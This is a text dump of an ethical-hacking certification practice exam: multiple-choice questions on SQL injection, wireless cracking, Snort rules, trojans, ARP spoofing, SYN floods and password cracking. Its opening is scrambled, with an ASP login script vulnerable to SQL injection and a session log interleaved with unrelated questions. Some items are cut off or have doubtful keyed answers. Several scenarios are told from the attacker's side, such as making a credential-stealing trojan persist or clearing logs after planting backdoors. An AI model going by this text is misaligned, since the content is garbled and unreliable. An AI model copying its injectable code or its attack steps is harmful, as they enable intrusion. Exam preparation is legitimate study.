Connection") objConn. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. preventing legitimate users from gaining access QUESTION 312: What is the problem with this ASP script (login.OpenApplication("WebUsersConnection") sSQL="SELECT * FROM Users where Username=? & Request("user") & _ "?and Password=? & Request("pwd") & "? Set RS = objConn. The ASP script is vulnerable to XSS attack B. in which the Hacker opened an account with the bank.Redirect("login. The ASP script is vulnerable to Session Splice attack D.asp)? <% Set objConn = CreateObject("ADODB. The ASP script is vulnerable to Cross Site Scripting attack Answer: B QUESTION 318: In an attempt to secure his wireless network. The ASP script is vulnerable to SQL Injection attack C. an attacker. sessionID= 0x9062757935FB5C64 Transfer Funds user jason Pay Bill user mike Logout of user mike What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer) A.EOF then Response.Login of user jason. He concludes that since his access points require the client computer to have the proper SSID. QUESTION 310: Jimmy. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools. knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. sessionID= 0x90627579944CCB811 Login of user mike. The Hacker attempted Session hijacking. What technique does Jimmy use to compromise a database? A. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability. it would prevent others from connecting to the wireless network. sessionID= 0x75627578626F6F6B Login of user daniel. C. Bob turns off broadcasting of the SSID. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system C. Jimmy can gain control of system to flood the target system with requests.asp") End If %> A. guessed the next ID and took over Jason's session. B.Execute(sSQL) If RS. D.Redirect("mainpage.asp?msg=Invalid Login") Else Session. Jimmy can submit user input that executes an operating system command to compromise a target system B. 55 .Authorized = True Set RS = nothing Set objConn = nothing Response. sessionID= 0x98627579539E13BE Login of user rebecca. then logged in to receive a session ID.

The SSID is to identify a station. B. C. John the Ripper QUESTION 333: Derek has stumbled upon a wireless network and wants to assess its security. Unauthorized access point attack C. B. open system authentication Answer: C QUESTION 330: Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with lesser packets. You would like to recommend a tool that uses KoreK's implementation. As users send authentication data. War Chalking D. Attempt to brute force the access point and update or delete the MAC ACL. Aircrack D. not a network. you are able to capture it. All access points are shipped with a default SSID. Which tool would you recommend from the list below? A. QUESTION 326: In order to attack a wireless network. Sniff traffic if the WLAN and spoof your MAC address to one that you captured. Bob forgot to turn off DHCP. Answer: B QUESTION 329: Jackson discovers that the wireless AP transmits 128 bytes of plaintext. and the station responds by encrypting the plaintext. shared key authentication D.Unfortunately unauthorized users are still able to connect to the wireless network. B. Attempt to crack the WEP key using Airsnort. Bob's solution only works in ad-hoc mode. The SSID is still sent inside both client and AP packets. D. Shmoo C. Why do you think this is possible? A. no authentication B. What authentication mechanism is being followed here? A. Rouge access point attack B. C. SSID is used to identify the network. The SSID is the same as the MAC address for all vendors. D. single key authentication C. The SSID is transmitted in clear text. you put up an access point and override the signal of the real access point. From your attempts to connect to the WLAN you determine that they have deployed MAC filtering by using ACL on the access points. Kismet B. Why are SSID not considered to be a good security mechanism to protect a wireless networks? A. The SSID is only 32 bits in length. Steel a client computer and use it to access the wireless network. WEP attack QUESTION 327: On wireless networks. What kind of attack is this? A. D. C. 56 . What would be the easiest way to circumvent and communicate on the WLAN? A. QUESTION 324: While probing an organization you discover that they have a wireless network. It then transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic.

1.) C.0 subnet B.168. Use any ARP requests found in the capture B. alert tcp any any -> any any 21 (content:"user root".) A. Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure that each child process can't elevate privilege Answer: B QUESTION 368: Ron has configured his network to provide strong perimeter security.168. IP Tables B. The roll out expenses has posed constraints on purchasing other essential security equipment and software. Derek can use a session replay on the packets captured C. As part of his network architecture. Rebecca should make a recommendation to upgrade the Linux kernel promptly C. An alert is generated when a TCP packet is generated from any IP on the 192. Rebecca should make a recommendation to set all child-process to sleep within the execve() D.0 subnet on port 111 QUESTION 358: Jim's organization has just completed a major Linux roll out and now all of the organization's systems are running the Linux 2.) QUESTION 366: Rebecca is a security analyst and knows of a local root exploit that has the ability to enable local users to use available exploits to gain root privileges. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP.0/24 111 (content:"|00 01 86 a5|". msg: "mountd access". IP Sniffer D. The system is on the public side of the demilitarized zone.168. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192. IP ICMP QUESTION 364: Which of the following snort rules look for FTP root login attempts? A.1.0 subnet and destined to any IP on port 111 D.1.) D.168.1. alert tcp -> any port 21 (message:"user root". This vulnerability exploits a condition in the Linux kernel within the execve() system call. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192. There is no known workaround that exists for this vulnerability.168. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192. Which built-in functionality of Linux can achieve this? A. unprotected by a firewall or filtering router.) B. What is the correct action to be taken by Rebecca in this situation as a recommendation to management? A. How can he generate traffic on the network so that he can capture enough packets to crack the WEP key? A. Derek can use KisMAC as it needs two USB devices to generate traffic D. alert tcp -> any port 21 (msg:"user root".0 subnet C. alerttcp any any --> 192.1.However. alert ftp -> ftp (content:"user password root". Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic QUESTION 335: Study the snort rule given below and interpret the rule. he has included a host that is fully exposed to attack.5 kernel. What would you call such a host? 57 . IP Chains C. he does not find enough traffic for a good capture. Rebecca should make a recommendation to disable the () system call B.

They are not using an intrusion detection system. He has identified the operating system as Linux and been able to elicit responses from ports 23. How is it possible to list processes and uids associated with them in a more reliable manner? A. It is getting more challenging and harder to hack for non technical people. What do you think is the main reason behind the significant increase in hacking attempts over the past years? A. When he tries to telnet to port 23 or 25. It is a collection of resource records. They are not using a stateful inspection firewall.org and other leading security organizations has clearly showed a steady rise in the number of hacking incidents perpetrated against companies. It is the first resource record type in the SOA. D. Honeypot B. Bastion Host QUESTION 370: Clive is conducting a pen-test and has just port scanned a system on the network. B. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. Use "netstat" QUESTION 383: While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. Use "Is" B. On typing other commands. An attacker has replaced the services with trojaned ones D. DWZ host D. C. DMZ host C. port 25 as running SMTP service and port 53 as running DNS service. Eric network has been penetrated by a firewall breach 58 . It is the first domain that belongs to a company. What can you infer from this observation? A. QUESTION 414: Eric notices repeated probes to port 1080. B. what is denoted by a 'zone'? A. They are using Windows based web servers. Use "echo" D. D. New TCP/IP stack features are constantly being added. What would be your inference? A. he sees only blank spaces or underscores symbols on the screen. Answer: B QUESTION 392: Statistics from cert. The services are protected by TCP wrappers B. This indicates that the telnet and SMTP server have crashed QUESTION 371: On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned. 25 and 53. He wonders if his firewall has been breached. The ease with which hacker tools are available on the Internet. C. C.A. It is a collection of domains. D. B. He infers port 23 as running Telnet service. There is a phenomenal increase in processing power. he gets a blank screen in response. QUESTION 391: When referring to the Domain Name Service. There is a honeypot running on the scanned machine C. What are you most likely to infer from this? A. Use "lsof" C. The client confirms these findings and attests to the current availability of the services. They are using UNIX based web servers.

A chained exploit. He can use a dynamic return address to overwrite the correct value in the target machine computer memory C. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal.to change the signature of his exploit as seen by a network IDS QUESTION 417: John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Sends back bogus data to the port scanner B. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. QUESTION 429: Bob has a good understanding of cryptography. there are two approaches to network intrusion detection: signature detection. you find it tedious to perform extended functions. integrity and enable strong authentication but it can't mitigate programming errors. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS? A. The attacker is using the ICMP protocol to have a covert channel C. Additionally. A buffer under run exploit. What is a good example of 59 . a network user has successfully connected to a remote server on port 80 using netcat. It can provide data privacy. He can use polymorphic shell code-with a tool such as ADMmutate . Eric has a Wingate package providing FTP redirection on his network D. Log a violation and recommend use of security-auditing tools C. and anomaly detection. which would indicate an intrusion. Use Monkey shell C. A buffer overflow exploit. Jack. Use ClosedVPN B. He can use a shellcode that will perform a reverse telnet back to his machine B. Use reverse shell using FTP protocol D. A SQL injection exploit. Assuming an attacker wants to penetrate John's network. Limit access by the scanning system to publicly available ports only D. E. B. Update a firewall rule in real time to prevent the port scan from being completed QUESTION 427: You have been using the msadc. having worked with it for many years. Somebody is using SOCKS on the network to communicate through the firewall QUESTION 415: Basically. which of the following options is he likely to choose? A. D. he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports.pl attack script to execute arbitrary commands on an NT4 web server. Cryptography is used to secure data from specific threats but it does not secure the data from the specific threats but it does no secure the application from coding errors. C. A SUID exploit. He could in turn drop a shell from the remote machine. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice D. Use HTTPTunnel or Stunnel on port 80 and 443 Answer: D QUESTION 418: A program that defends against a port scanner will attempt to: A. On further research you come across a perl script that runs the following msadc functions: What kind of exploit is indicated by this script? A.B. While it is effective.

and the program responds by emitting an intruder alert into syslog. Unauthorized access D. High bandwidth and large number of users. A firewall has been breached and this is logged E. the investigator goes through the files on the suspect's workstation. Web server attack B. Grayhat Hacker D. 60 .a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? A. Bluehat Hacker QUESTION 463: Certkiller . A buffer overflow. he find the following: What does this file contain? A. Bad quality assurance on software produced.txt' but when he opens it. The system has crashed B. Whitehat Hacker B. CR (0x0d). Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error QUESTION 430: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. Bad permissions on files. Steven always signs a non-disclosure agreement before performing his tests. An encrypted file. If the canary word has been altered when the function returns. QUESTION 431: While investigating a claim of a user downloading illegal material. BlackHat Hacker C. D. Information gathering C. What is the most common cause of buffer overflow in software today? A. QUESTION 435: A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00). C. B. He comes across a file that is called 'file. LF (0x0a) and EOF (0xff) so that most string operations are terminated. What would Steven be considered? A. A buffer overflow attack has been attempted C. B. C. Usage of non standard programming languages. Denial of service attack QUESTION 461: Steven works as a security consultant and frequently performs penetration tests for Fortune 500 companies. Bob can explain that using a weak key management technique is a form of programming error B. D. A buffer overflow attack has already occurred D. Steven runs external and internal tests and then creates reports to show the companies where their weak areas are.txt extension. and then halts what does it indicate? A.com is legally liable for the content of email that is sent from its systems. A picture that has been renamed with a . An intrusion detection system has been triggered QUESTION 454: Which type of attack is port scanning? A. A uuencoded file.

Use stateful inspection on the firewalls QUESTION 480: Lori has just been tasked by her supervisor conduct vulnerability scan on the corporate network. Lori wants to do exactly what her boos has told her. Website Cloaking B. but is still worried about programs like Hping2 that can get into a network through convert channels. Lori's company does not own any commercial scanning products. True B. the hacker's system immediately mounted a distributed denial-of-service attack against the federal system. so she decides to download a free one off the Internet. When federal investigators using PCs running windows and using Internet Explorer visited the hacker's shared site. He has placed very stringent rules on all the firewalls. One of the option is to choose which ports that can be scanned. Companies today are engaging in tracking competitor's through reverse IP address lookup sites like whois. He has spent the last month securing access to his network from all possible entry points. outgoing email was found to contain material that was pornographic. racist or likely to incite someone to commit an act of terrorism.com. What is this masking technique called? A. 61 . Lori has never done a vulnerability scan before. For example if you are using a machine with the Linux Operating System and the Netscape browser then you will have access to their website in a convert way. Website Filtering C. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Block All Incoming traffic on port 53 C. Hackers sometimes set a number of criteria for accessing their website. Mirrored WebSite QUESTION 479: Mark works as a contractor for the Department of Defense and is in charge of network security. When normal users visit the website they are directed to a page with full-blown product details along with attractive discounts. blocking everything in and out except ports that must be used. for example. This is based on IP-based blocking. False QUESTION 464: The terrorist organizations are increasingly blocking all traffic from North America or from Internet Protocol addresses that point to users who rely on the English Language.regardless of whether the message was sent for private or business-related purpose. IP Access Blockade D. which provide an IP address's domain. This could lead to prosecution for the sender and for the company's directors if. Mark is fairly confident of his perimeter defense. A. but she does not know ports should be scanned. This information is shared among the co-hackers. When the competitor visits the companies website they are directed to a products page without discount and prices are marked higher for their product. He has segmented his network into several subnets and has installed firewalls all over the network. Blocking ICMP type 13 messages B. You can always defend yourself by "ignorance of the law" clause. She has been instructed to perform a very thorough test of the network to ensure that there are no security holes on any of the machines. where certain addresses are barred from accessing a site. Block All outgoing traffic on port 53 D. How should mark protect his network from an attacker using Hping2 to scan his internal network? A. so she is unsure of some of the settings available in the software she downloaded.

they trace the source back to a proxy server in China. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in QUESTION 486: The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). has just discovered that his network has been breached by an outside attacker. Lori should not scan TCP ports. host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag. 'Dial backup' in routers is most frequently found in networks where redundancy is required. Run a war-dialing tool with range of phone numbers and look for CONNECT Response C. how many ports should she select in the software? A. A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network. only UDP ports QUESTION 485: War dialing is one of the oldest methods of gaining unauthorized access to the target systems. This flag releases the connection resources. Through wardialing an attacker searches for the devices located in the target network infrastructure that are also accessible through the telephone line. 1024 C. As a security testers. Connect using ISP's remote-dial in number since the company's router has a leased line connection established with them D. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Search the Internet for leakage for target company's telephone number to dial-in B. A. FIN Scan Answer: A QUESTION 488: Gerald. it is one of the dangers most commonly forgotten by network engineers and system administrators. the systems administrator for Hyped Enterprise. Gerald calls the company that owns the proxy server and after searching through their logs.If Lori is supposed to scan all known TCP ports. However. After performing routine maintenance on his servers. XMAS Scan C. True B. 65536 B. 1025 D. False Answer: A QUESTION 487: Which type of scan does not open a full TCP connection? A. Stealth Scan B. Null Scan D. how would you discover what telephone numbers to dial-in to the router? A. Dial-on-demand routing(DDR) is commonly used to establish connectivity as a backup. his discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald traces the IP address he found in the IDS log to proxy server in Brazil. What tool Geralds's attacker used to cover their tracks? 62 . they trace the source to another proxy server in Switzerland.

He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. Hping2 diagnosis C. BSSA C. Escalate his/her privileges on the target server D. IAS D. To create a user with administrative privileges for later use QUESTION 497: Samuel is the network administrator of DataX communications Inc. He is confident that this rule will secure his network hackers on the Internet. A Bo2K System query D. An SNMP Walk B. ISA C. PMUS QUESTION 491: While reviewing the results of a scan run against a target network you come across the following: What was used to obtain this output? A. MBSA B. Nmap protocol/port scan QUESTION 494: Jonathan being a keen administrator has followed all of the best practices he could find on securing his Windows Server. How can a remote attacker decipher the name of the administrator account if it has been renamed? A. She has asked the Systems Administrator to create a group policy that would not allow null sessions on the network. The attacker used NMAP with the V option QUESTION 496: Maurine is working as a security consultant for Hinklemeir Associate. But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. Maurine is trying to explain to the Systems Administrator that hackers will try to create a null session when footprinting the network. Enumerate users shares B. The attacker used to sid2user program D. A. Install a backdoor for later attacks C.It then provides links that enable those missing patches to be downloaded and installed.A. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall use. He renamed the Administrator account to a new name that can't be easily guessed but there remain people who attempt to compromise his newly renamed administrator account. Tor B. The Systems Administrator is fresh out of college and has never heard of null sessions and does not know what they are used for. ASNB D. Why would an attacker try to create a null session with a computer on a network? A. The attacker used the user2sid program C. Cheops Answer: A QUESTION 489: Which of the following is a patch management utility that scans one or more computers on your network and alerts you if you important Microsoft Security patches are missing. The attacker guessed the new name B. 63 . He is trying to configure his firewall to block password brute force attempts on his network.

If the password is 7 characters or less. Travis frequently has to get on the Internet to do research on what he is working on. Samuel wants to completely block hackers brute force attempts on his network. He has seen these windows show up. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually C. it would take 45 seconds to return to the user to begin another attempt. folder by folder to see if there is anything he can find. According to his calculations. Enforce a password policy and use account lockouts after three wrong logon attempts even through this might lock out legit users B. 0xAAD3B435B51404CC Answer: A QUESTION 499: Travis works primarily from home as a medical transcriptions. Logic Bomb's triggered at random times creating hidden data consuming junk files QUESTION 500: Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system without ever decrypting or 64 . Travis also notices a window or two pop-up on his screen. which is why he bought the new computer. Travis is really worried about his computer because he spent a lot of money on it and he depends on it to work. anti-spyware software and always keeps the computer up-to-date with Microsoft patches. he also throttles the number of connections that will be prepared to accept from a particular IP address. He spends over four hours pouring over the files and folders and can't find anything but before he gives up. Since has drive is a 200 GB hard drive. This action will slow the intruder's attempts. he notices that his computer only has about 10 GB of free space available. 0xAAD3B435B51404EE B. Travi's Computer is infected with Stealth Torjan Virus C. Travis's Computer is infected with stealth kernel level rootkit B. but they quickly disappear. 0xAAD3B435B51404BB D. After another month of working on the computer. Travis uses antivirus software. After about two months of working on his new computer. Travis computer is even more noticeable slow. Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer.Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect. What are the alternatives to defending against possible brute-force password attacks on his site? A. He just bought a brand new Dual Core Pentium Computer with over 3 GB of RAM. Every once in awhile. even when he has not been on the Internet. You can't completely block the intruders attempt if they constantly switch proxies QUESTION 498: LAN Manager passwords are concatenated to 14 bytes and split in half. he should have around 150 GB of free space. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space D. Travis scans his through Windows Explorer and check out the file system. he notices that it is not running nearly as fast as it used to. 0xAAD3B435B51404AA C. Since an intruder may use multiple machines to brute force the password. What is mostly likely the cause of Travi's problems? A. He uses voice recognition software is processor intensive. The two halves are hashed individually. Enforce complex password policy on your network so that passwords are more difficult to brute force D. Travis thinks this is very odd. than the second half of the hash is always: A.

decoding the hash. A. Replay Attacks B. Brute Force Attacks C. Cryptography Attacks D. John the Ripper Attacks QUESTION 501: You are the IT Manager of a large legal firm in California. Your firm represents many important clients whose names always must remain anonymous to the public. Your boss, Mr. Smith is always concerned about client information being leaked or revealed to the pres or public. You have just finished a complete security overhaul of your information system including an updated IPS, new firewall, email encryption and employee security awareness training. Unfortunately, many of your firm's clients do not trust technology to completely secure their information, so couriers routinely have to travel back and forth to and from the office with sensitive information. Your boss has charged you with figuring out how to secure the information the couriers must transport. You propose that the data be transferred using burned CD's or USB flash drives. You initially think of encrypting the files, but decide against that method for fear the encryption keys could eventually be broken. What software application could you use to hide the data on the CD's and USB flash drives? A. Snow B. File Snuff C. File Sneaker D. EFS QUESTION 502: You are the security administrator for a large online auction company based out of Los Angeles. After getting your ENSA CERTIFICATION last year, you have steadily been fortifying your network's security including training OS hardening and network security. One of the last things you just changed for security reasons was to modify all the built-in administrator accounts on the local computers of PCs and in Active Directory. After through testing you found and no services or programs were affected by the name changes. Your company undergoes an outside security audit by a consulting company and they said that even through all the administrator account names were changed, the accounts could still be used by a clever hacker to gain unauthorized access. You argue with the auditors and say that is not possible, so they use a tool and show you how easy it is to utilize the administrator account even though its name was changed. What tool did the auditors use? A. sid2user B. User2sid C. GetAcct D. Fingerprint Answer: A QUESTION 505: You have successfully brute forced basic authentication configured on a Web Server using Brutus hacking tool. The username/password is "Admin" and "Bettlemani@". You logon to the system using the brute forced password and plant backdoors and rootkits. After downloading various sensitive documents from the compromised machine, you proceed to clear the log files to hide your trace.. Which event log located at C:\Windows\system32\config contains the trace of your brute force attempts? A. AppEvent.Evt B. SecEvent.Evt

65

C. SysEvent.Evt D. WinEvent.Evt QUESTION 507: William has received a Tetris game from someone in his computer programming class through email. William does not really know the person who sent the game very well, but decides to install the game anyway because he really likes Tetris. After William installs the game, he plays it for a couple of hours. The next day, William plays the Tetris game again and notices that his machines have begun to slow down. He brings up his Task Manager and sees the following programs running (see Screenshot): What has William just installed? A. Remote Access Trojan (RAT) B. Zombie Zapper (ZoZ) C. Bot IRC Tunnel (BIT) D. Root Digger (RD) QUESTION 509: You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create an executable file chess.exe. This Trojan when executed on the victim machine, scans the entire system (c:\) for data with the following text "Credit Card" and "password". It then zips all the scanned files and sends an email to a predefined hotmail address. You want to make this Trojan persistent so that it survives computer reboots. Which registry entry will you add a key to make it persistent? A. HKEY_LOCAL_MACHINE\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices B. HKEY_LOCAL_USER\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices C. HKEY_LOCAL_SYSTEM\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices D. HKEY_CURRENT_USER\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices Answer: A QUESTION 510: You are sniffing as unprotected WiFi network located in a JonDonalds Cybercafe with Ethereal to capture hotmail e-mail traffic. You see lots of people using their laptops browsing the web while snipping brewed coffee from JonDonalds. You want to sniff their email message traversing the unprotected WiFi network. Which of the following ethereal filters will you configure to display only the packets with the hotmail messages? A. (http contains "hotmail") && ( http contains "Reply-To") B. (http contains "e-mail" ) && (http contains "hotmail") C. (http = "login.passport.com" ) && (http contains "SMTP") D. (http = "login.passport.com" ) && (http contains "POP3") QUESTION 513: Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position. Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of traffic is being passed around but the program he is using does not seem to be capturing anything. He pours through the sniffer's manual but can't find anything that directly relates to his problem. Harold decides to ask the network administrator if the has any thoughts on the problem. Harold is told that the sniffer was not working because the agency's network is a switched network, which can't be

66

sniffed by some programs without some tweaking. What technique could Harold use to sniff agency's switched network? A. ARP spoof the default gateway B. Conduct MiTM against the switch C. Launch smurf attack against the switch D. Flood switch with ICMP packets Answer: A Explanation: ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack). QUESTION 514: How do you defend against ARP spoofing? A. Place static ARP entries on servers, workstation and routers B. True IDS Sensors to look for large amount of ARP traffic on local subnets C. Use private VLANS D. Use ARPWALL system and block ARP spoofing attacks Answer: A,B,C QUESTION 515: The network administrator at Spears Technology, Inc has configured the default gateway Cisco Router's access-list as below: You are tried to conduct security testing on their network. You successfully brute-force for SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco Configuration from the router. How would you proceed? A. Send a customized SNMP set request with spoofed source IP Address in the range192.168.1.0 B. Run a network sniffer and capture the returned traffic with the configuration file from the router C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address D. Use the Cisco's TFTP default password to connect and download the configuration file Answer: A,B QUESTION 516: What does the following command in "Ettercap" do? ettercap-NCLzs -quiet A. This command will provide you the entire list of hosts in the LAN B. This command will check if someone is poisoning you and will report its IP C. This command will detach ettercap from console and log all the sniffed passwords to a file D. This command broadcasts ping to scan the LAN instead of ARP request all the subset IPs QUESTION 518: Steven is a senior security analyst for a state agency in Tulsa, Oklahoma. His agency is currently undergoing a mandated security audit by an outside consulting firm. The consulting firm is halfway through the audit and is preparing to perform the actual penetration testing against the agency's network. The firm first sets up a sniffer on the agency's wired network to capture a reasonable amount of traffic to analyze later. This takes approximately 2 hours to obtain 10 GB of data. The consulting firm then sets up a sniffer on the agency's wireless network to capture

67

MSN Messenger C. not the first. RST cookies . Direct in person C. Instead of allocating a complete connection. SYN cookies. TCP can be tweaked in order to reduce the effect of SYN floods.B. Don't use this technique unless you understand 68 . C. False Answer: A Explanation: Using HTTP basic authentication will result in your password being sent over the internet as clear text. which the server then verifies. Because wireless access points act like hubs on a network B. A. even when encrypted C. True B. SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP Address Victim responds to spoofed IP Address then waits for confirmation that never arrives (timeout wait is about 3 minutes) Victim's connection table fills up waiting for replies and ignores new connection legitimate users are ignored and will not be able to access the server How do you protect your network against SYN Flood attacks? A. Attacker creates a random source address for each packet. Thus the server first allocates memory on the third packet of the handshake. send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP Address port number and other information. Why did capturing of traffic take much less time on the wireless network? A. simply allocate a micro-record of 16-bytes for the incoming SYN object. Micro Blocks.The server sends a wrong SYN|ACK back to the client. When the client responds with a normal ACK. Stack Tweaking. Email B. QUESTION 522: Hackers usually control Bots through: A. Yahoo Chat E. Trojan Client Software D. that special sequence number will be included.the same amount of traffic. Because all traffic is clear text. The client should then generate a RST packet telling the server that something is wrong. This capture only takes about 30 minutes to get 10 GB of data. Most TCP/IP stacks today are already tweaked to make it harder to perform a SYN flood DOS attack against a target. B. Peer to Peer Networks QUESTION 529: Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. Instead of allocating a record. Answer: A.D Explanation: All above helps protecting against SYN flood attacks. Because wireless networks can't enable encryption QUESTION 521: The SYN Flood attack sends TCP connections requests faster than a machine can process them. IRC Channel B. At this point. Local Area Networks D. Reduce the timeout before a stack frees up the memory allocated for a connection.C. D. Because wireless traffic uses only UDP which is easier to sniff D. the server knows the client is valid and will now accept incoming connections from that client normally. GoogleTalk QUESTION 527: What is the most common vehicle for social engineering attacks? A.

but does not have a lot of time to crack it. He is currently working on breaking into the Department of Defense's front end exchange server. What tool would be best used to accomplish this? A. PERM. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. SmurfCrack D. CLACS. but found the smart cards to not be cost effective.what the ramifications of this are. What type of device should Joseph use for two-factor authentication? A. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company.EXE QUESTION 535: Johnny is a member of the hacking group orpheus1. DNS Spoofing QUESTION 541: Joseph has just been hired on to a contractor company of the Department of Defense as their senior Security Analyst. Per the Department of Defense. Johnny wants to crack the administrator password. by using an unused service account that had a very weak password that he was able to guess. What is Paul seeing here? A. PSCrack QUESTION 540: Paul has just finished setting up his wireless network. He has enabled numerous security features such as changing the default SSID.EXE D. Joseph has been instructed on the Company's strict security policies that have been implemented and the policies that have yet to be put in place. Proximity cards QUESTION 543: What does the this symbol mean? 69 . Paul notices when he uses his wireless connection. Paul connects to his wireless router's management utility and notices that a machine with an unfamiliar name is connected through his wireless connection.EXE C. NTPERM. OTP D. the speed is sometimes 54 Mbps and sometimes it is only 24mbps or less. CACLS. enabling WPA encryption and enabling MAC filtering on hi wireless router. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. all DoD users and the users of their contractors must use two-factor authentication to access their networks. Security token B. SMBCrack C.EXE B. ARP Spoofing D. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop. Macof C. located in a DMZ. MAC Spoofing B. RainbowCrack B. He was able to get into the server. Biometric device C. Which of the following tools could be used for this purpose? A. Joseph's company has already researched using smart cards and all the resources needed to implement them. QUESTION 530: Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign display or modify ACLs (Access Control Lists) to files or folders and that could also be used within batch files.

Bob's network is safe C. Poisoned the local DNS cache of the server QUESTION 552: Angela is trying to access an education website that requires a username and password to login. He places the antenna for the access point near the center of the building. she gets 70 . He has enabled hardware and software firewalls. Open Access Point B. Downloaded a file to his local computer C. Bob figures that with this and his placement of antennas. Where is the password file kept is Linux? A. /bin/password D.11a D. there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Blake gets the following results: What has the Blake just accomplished? A.0 After pressing enter twice. Grabbed the banner B. WEP Encrypted Access Point D. WPA Encrypted Access Point C. When Angela clicks on the link to access the login page. Bob's network will not be safe until he also enables WEP B. Bob's network will be sage but only if he doesn't switch to 802. his wireless network will be safe from attack. With the 300-foot limit of a wireless signal. Wireless signals can be detected from miles away. Bob decides to use strategic antenna positioning. /bin/shadow Answer: A QUESTION 549: Blake is in charge of securing all 20 of his company's servers. /etc/shadow B. /etc/passwd C. Unfortunately. Blake is especially concerned about his since telnet can be a very large security risk in an organization. hardened the operating systems and disabled all unnecessary service on all the servers. Closed Access Point Answer: A QUESTION 544: In an attempt to secure his 802. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the buildings center. Submitted a remote command to crash the server D. Bob's network is not safe QUESTION 548: You are trying to compromise a Linux Machine and steal the password hashes for cracking with password brute forcing program. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Which of he following statements is true? A. Blake is concerned about how his particular server might look to an outside attacker so he decides to perform some footprinting scanning and penetration tests on the server.A.11b wireless network. Blake telents into the server and types the following command: HEAD/HTTP/1.

